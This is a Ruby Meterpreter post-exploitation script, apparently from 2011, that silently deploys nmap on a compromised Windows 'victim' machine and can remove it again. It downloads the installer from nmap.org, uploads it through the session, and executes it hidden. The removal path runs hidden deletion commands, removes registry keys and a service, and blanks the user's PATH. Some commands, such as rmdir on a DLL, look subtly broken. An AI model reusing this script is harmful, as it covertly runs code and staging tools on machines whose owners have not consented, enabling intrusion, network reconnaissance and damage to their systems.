# $Id: deploy_nmap.rb 8/8/2011 # email: zitstif[@]gmail.com # website: http://zitstif.no-ip.org/ # name: Kyle Young # Meterpreter script for deploying nmap on victim Windows Machine #--------------------------------------------------------------- # require 'open-uri' require 'net/http' session = client $force = "" $removal = "" def usage() print_line("Meterpreter script for deploying nmap on a victim machine") print_line("Usage:\tdeploy_nmap") print_line("OR:\tdeploy_nmap -f\n") print_line("OPTIONS:\n") print_line("-h\tThis help menu") print_line("-f\tForce the install of nmap") print_line("-r\tRemove Nmap (this will also uninstall WinPcap)") raise Rex::Script::Completed end @@exec_opts = Rex::Parser::Arguments.new( "-h" => [ false, "This is the help menu"], "-f" => [ false, "Force install" ], "-r" => [ false, "Remove nmap" ] ) @@exec_opts.parse(args) { |opt, idx, val| case opt when "-h" usage() when "-f" print_status("'Force Install' option selected..") $force = "valid" when "-r" print_status("WARNING: End user has vouched for the removal of nmap!") $removal = "true" end } if !(client.platform =~ /win32|win64/) print_error("This meterpreter script won't work on this system!") raise Rex::Script::Completed end ############UNINSTALL SECTION############## if $removal == "true" print_status("Deleting nmap files...") if client.platform =~ /win32/ client.sys.process.execute("cmd.exe /c rmdir /S /Q \"C:\\Program\ Files\\Nmap\"", nil, {'Hidden' => 'true', 'Channelized' => true}) end if client.platform =~ /win64/ client.sys.process.execute("cmd.exe /c rmdir /S /Q \"C:\\Program\ Files\ (x86)\\Nmap\"", nil, {'Hidden' => 'true', 'Channelized' => true}) end print_status("Removing start menu entries..") winver = session.sys.config.sysinfo if winver["OS"] =~ (/Windows 7|Vista|Windows 2008/) client.sys.process.execute("cmd.exe /c rmdir /S /Q \"%USERPROFILE%\\appdata\\Roaming\\Microsoft\\Windows\\Start\ Menu\\Programs\\Nmap\"", nil, {'Hidden' => 'true', 'Channelized' => true}) end if winver["OS"] =~ (/Windows XP|Windows 2000|Windows 2003/) client.sys.process.execute("cmd.exe /c rmdir /S /Q \"%USERPROFILE%\\Start\ Menu\\Programs\\Nmap\"", nil, {'Hidden' => 'true', 'Channelized' => true}) end print_status("Removing a few dlls...") client.sys.process.execute("cmd.exe /c del %SYSTEMROOT%\\system32\\Packet.dll", nil, {'Hidden' => 'true', 'Channelized' => true}) if winver["OS"] =~ (/Windows XP|Windows 2000|Windows 2003/) client.sys.process.execute("cmd.exe /c rmdir /S /Q %SYSTEMROOT%\\system32\\pthreadVC.dll", nil, {'Hidden' => 'true', 'Channelized' => true}) end print_status("Deleteing rpcapd service..") client.sys.process.execute("cmd.exe /c sc delete rpcapd", nil, {'Hidden' => 'true', 'Channelized' => true}) print_status("Uninstalling Winpcap..") if client.platform =~ /win32/ client.sys.process.execute("cmd.exe /c \"C:\\Program\ Files\\WinPcap\\uninstall.exe\" /S", nil, {'Hidden' => 'true', 'Channelized' => true}) end if client.platform =~ /win64/ client.sys.process.execute("cmd.exe /c \"C:\\Program Files\ (x86)\\WinPcap\\uninstall.exe\" /S", nil, {'Hidden' => 'true', 'Channelized' => true}) end if client.platform =~ /win32/ client.sys.process.execute("cmd.exe /c rmdir /S /Q \"C:\\Program\ Files\\WinPcap\"", nil, {'Hidden' => 'true', 'Channelized' => true}) end if client.platform =~ /win64/ client.sys.process.execute("cmd.exe /c rmdir /S /Q \"C:\\Program\ Files\ (x86)\\WinPcap\"", nil, {'Hidden' => 'true', 'Channelized' => true}) end keys32 = [ "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Nmap", "HKLM\\SOFTWARE\\WinPcap", "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WinPcapInst" ] key64 = "HKLM\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Nmap" print_status("Removing PATH variable that the Nmap installation has set..") session.console.run_single('reg setval -k HKCU\\\\ENVIRONMENT -v PATH -d " "') print_status("Deleting registry keys created by Nmap...") def remove_key(key) root_key, base_key = client.sys.registry.splitkey(key) status = client.sys.registry.delete_key(root_key, base_key) return status end if client.platform =~ /win32/ keys32.each { |i| remove_key(i) } end if client.platform =~ /win64/ remove_key(key64) end print_status("Removal of Nmap has completed..") raise Rex::Script::Completed end #Check to see if nmap is arleady installed..# if not $force == "valid" if client.platform =~ /win32/ print_status("Checking to see if nmap is already installed..(Win32)") nmapPath="C:\\Program Files\\Nmap\\nmap.exe" begin client.fs.file.stat(nmapPath) print_error("Nmap appears to already be installed!") print_status("If you want to do a force install of nmap, please use -f") status = "discovered" rescue print_status("Nmap doesn't appear to be installed") end end if client.platform =~ /win64/ print_status("Checking to see if nmap is already installed..(Win64)") nmapx86="C:\\Program Files (x86)\\Nmap\\nmap.exe" begin client.fs.file.stat(nmapx86) print_error("Nmap appears to already be installed!") print_status("If you want to do a force install of nmap, please use -f") status = "discovered" rescue print_status("Nmap doesn't appear to be installed in the (x86) directory") end end end if status == "discovered" print_error("Nmap appears to be already installed! Quitting!") raise Rex::Script::Completed end open('http://nmap.org/download.html') do |f| f.each do |line| if line =~ /Latest stable<\/u> release self-installer:/ newvar = line.split('"') fileurl = newvar[1] filename = fileurl.split('/') path = filename[3] filename = filename[4] filepath = "/#{path}/#{filename}" print_status("Downloading latest stable version of nmap to local system..") print_status("This may take a little while..") Net::HTTP.start("nmap.org") do |http| resp = http.get(filepath) open(filename, "wb") do |file| file.write(resp.body) print_status("Done downloading nmap to local system..") print_status("Uploading to victim..") session.console.run_single("upload #{filename}") print_status("Now installing Nmap with /S switch..") session.console.run_single("execute -H -f #{filename} -a /S") print_status("nmap should be installing now..") print_status("sleeping for 15 seconds..") sleep 15 print_status("Deleting the install file on victim machine..") client.sys.process.execute("cmd.exe /c del nmap*.exe", nil, {'Hidden' => 'true', 'Channelized' => true}) print_status("Deleting the install file locally..") `rm nmap*.exe` print_status("Adjusting the PATH variable to be safe..") if client.platform =~ /win32/ client.sys.process.execute("cmd.exe /c set PATH=\"%PATH%;C:\\Program Files\\Nmap\"", nil, {'Hidden' => 'true', 'Channelized' => true}) end if client.platform =~ /win64/ client.sys.process.execute("cmd.exe /c set PATH=\"%PATH%;C:\\Program Files\ (x86)\\Nmap\"", nil, {'Hidden' => 'true', 'Channelized' => true}) end print_status("Use the 'shell' command and type nmap -h") print_status("If you have issues check the PATH variable") print_status("You may have to manually set it (i.e. set PATH=%PATH%;C:\\Program\ Files\\Nmap\\)") end end end end end